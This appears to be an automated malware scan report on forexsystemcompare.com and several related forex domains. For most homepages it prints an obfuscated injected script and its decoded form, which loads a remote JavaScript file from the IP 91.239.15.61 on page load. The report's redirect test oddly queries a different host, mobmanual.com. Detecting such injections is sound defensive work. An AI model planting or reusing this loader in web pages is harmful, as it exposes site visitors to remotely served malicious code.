Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=forexsystemcompare.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mobmanual.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 Jun 2014 09:26:07 GMT
Server: Apache
Content-Length: 3605
Content-Type: text/html; charset=UTF-8
Set-Cookie: 6666cd76f96956469e7be39d750cc7d9=1401873967; expires=Wed, 04-Jun-2014 10:26:07 GMT; path=/
X-Pingback: http://mobmanual.com/xmlrpc.php
X-Powered-By: PleskLin
...3605 bytes of data.
GET / HTTP/1.1
Host: mobmanual.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 Jun 2014 09:26:07 GMT
Server: Apache
Content-Length: 3605
Content-Type: text/html; charset=UTF-8
Set-Cookie: 6666cd76f96956469e7be39d750cc7d9=1401873967; expires=Wed, 04-Jun-2014 10:26:07 GMT; path=/
X-Pingback: http://mobmanual.com/xmlrpc.php
X-Powered-By: PleskLin
...3605 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mobmanual.com
Referer: http://www.google.com/search?q=mobmanual.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mobmanual.com
Referer: http://www.google.com/search?q=mobmanual.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://forexsystemcompare.com/ | 200 OK Content-Length: 15621 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21269 Content-Type: text/javascript | clean |
http://forexsystemcompare.com/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:28 GMT Accept-Ranges: bytes ETag: "12c9c83-4e4-4dfbfc00" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:34:56 GMT | malicious |
http://www.automated-forex-trading-software.org/ | 200 OK Content-Length: 15286 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.automated-forex-trading-software.org/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:29 GMT Accept-Ranges: bytes ETag: "12c97fc-4e4-34b10e80" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Wed, 30 Dec 2009 19:32:58 GMT | clean |
http://www.automated-forex-trading-software.org/test404page.js | 404 Not Found Content-Length: 349 Content-Type: text/html | clean |
http://forexsystemcompare.com/business-forex-online-trading.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:29 GMT Accept-Ranges: bytes ETag: "12c9c84-4db-4dfbfc00" Server: Apache Content-Length: 1243 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:34:56 GMT | malicious |
http://www.businessforexonlinetrading.com/ | 200 OK Content-Length: 15179 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.businessforexonlinetrading.com/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:29 GMT Accept-Ranges: bytes ETag: "12c9ab8-4e4-35141840" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Thu, 31 Dec 2009 13:26:49 GMT | malicious |
http://forexsystemcompare.com/compare-forex-brokers.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:29 GMT Accept-Ranges: bytes ETag: "12c9c85-4ce-4dfbfc00" Server: Apache Content-Length: 1230 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:34:56 GMT | malicious |
http://www.compare-forex-brokers.com/ | 200 OK Content-Length: 15221 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.compare-forex-brokers.com/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:30 GMT Accept-Ranges: bytes ETag: "12c9830-4e4-3bb99800" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Wed, 30 Dec 2009 19:34:56 GMT | malicious |
http://forexsystemcompare.com/ecn-forex.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:30 GMT Accept-Ranges: bytes ETag: "12c9c87-4b6-4e0b3e40" Server: Apache Content-Length: 1206 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:34:57 GMT | malicious |
http://www.ecn-forex.com/ | 200 OK Content-Length: 15289 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.ecn-forex.com/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:30 GMT Accept-Ranges: bytes ETag: "12c9865-4e4-435ab800" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Wed, 30 Dec 2009 19:37:04 GMT | malicious |
http://forexsystemcompare.com/forex-broker-in-malaysia.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:30 GMT Accept-Ranges: bytes ETag: "12c9c88-4d1-4e0b3e40" Server: Apache Content-Length: 1233 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:34:57 GMT | malicious |
http://www.forexbrokerinmalaysia.com/ | 200 OK Content-Length: 15860 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.forexbrokerinmalaysia.com/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:31 GMT Accept-Ranges: bytes ETag: "12c9c1b-4e4-43ac36c0" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:32:03 GMT | malicious |
http://forexsystemcompare.com/forex-carry-trade.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:31 GMT Accept-Ranges: bytes ETag: "12c9c89-4c4-4e0b3e40" Server: Apache Content-Length: 1220 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:34:57 GMT | malicious |
http://www.forexcarrytrade.com/ | 200 OK Content-Length: 15560 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.forexcarrytrade.com/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:31 GMT Accept-Ranges: bytes ETag: "12c9a84-4e4-30e7fac0" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Thu, 31 Dec 2009 13:25:39 GMT | malicious |
http://forexsystemcompare.com/forex-converter.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:32 GMT Accept-Ranges: bytes ETag: "12c9c8a-4c2-4e0b3e40" Server: Apache Content-Length: 1218 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:34:57 GMT | malicious |
http://www.forex-converter.net/ | 200 OK Content-Length: 15312 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.forex-converter.net/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:32 GMT Accept-Ranges: bytes ETag: "12c9a50-4e4-2c2346c0" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Thu, 31 Dec 2009 13:24:19 GMT | malicious |
http://forexsystemcompare.com/forex-currency-converter.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:32 GMT Accept-Ranges: bytes ETag: "12c9c8b-4d4-4e0b3e40" Server: Apache Content-Length: 1236 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:34:57 GMT | malicious |
http://www.forex-currency-converter.com/ | 200 OK Content-Length: 15305 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.forex-currency-converter.com/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:33 GMT Accept-Ranges: bytes ETag: "12c9d4f-4e4-f0cd3800" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Sat, 02 Jan 2010 20:00:32 GMT | malicious |
http://forexsystemcompare.com/forex-data-providers.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:33 GMT Accept-Ranges: bytes ETag: "12c9c8c-4ca-4e0b3e40" Server: Apache Content-Length: 1226 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:34:57 GMT | malicious |
http://www.forexdataproviders.com/ | 200 OK Content-Length: 15776 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.forexdataproviders.com/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:33 GMT Accept-Ranges: bytes ETag: "12c9a22-4e4-272189c0" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Thu, 31 Dec 2009 13:22:55 GMT | malicious |
http://forexsystemcompare.com/forex-hedging.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:33 GMT Accept-Ranges: bytes ETag: "12c9c8e-4be-4e0b3e40" Server: Apache Content-Length: 1214 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:34:57 GMT | malicious |
http://www.forex-hedging.net/ | 200 OK Content-Length: 15378 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... | ||
http://www.forex-hedging.net/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:33 GMT Accept-Ranges: bytes ETag: "12c99ee-4e4-22b86340" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Thu, 31 Dec 2009 13:21:41 GMT | malicious |
http://forexsystemcompare.com/forex-hedging-strategy.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:34 GMT Accept-Ranges: bytes ETag: "12c9c8d-4d0-4e0b3e40" Server: Apache Content-Length: 1232 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:34:57 GMT | clean |
http://www.forex-hedging-strategy.com/ | 200 OK Content-Length: 11392 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.automated-forex-trading-software.org <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>Forex Hedging Strategy</title> <meta name="keywords" content="automated forex trading software, business forex online trading, compare forex brokers, ecn forex, forex broke ...[4341 bytes skipped]... | ||
http://www.forex-hedging-strategy.com/automated-forex-trading-software.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:34 GMT Accept-Ranges: bytes ETag: "12c9781-4e4-2f721280" Server: Apache Content-Length: 1252 Content-Type: text/html Last-Modified: Tue, 29 Dec 2009 06:32:26 GMT | malicious |
http://forexsystemcompare.com/forex-leverage.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 01 Aug 2014 04:08:34 GMT Accept-Ranges: bytes ETag: "12c9c8f-4c0-4e0b3e40" Server: Apache Content-Length: 1216 Content-Type: text/html Last-Modified: Fri, 01 Jan 2010 20:34:57 GMT | malicious |
http://www.forex-leverage.com/ | 200 OK Content-Length: 15171 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 91.239.15.61 document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2 ...[3311 bytes skipped]... Decoded script: ...[117 bytes skipped]... ><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- function redirect() { var thecookie = readCookie('doRedirect'); if(!thecookie) { var head=document.getElementsByTagName('head')[0] var script=document.createElement('script') script.setAttribute('type', 'text/javascript') script.setAttribute('src', "http://91.239.15.61/google.js") head.appendChild(script) } } function createCookie(name,value,days) { if (days) { var date = new Date(); date.setTime(date.getTime()+(days*3600*3600*3600*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0; ...[389 bytes skipped]... |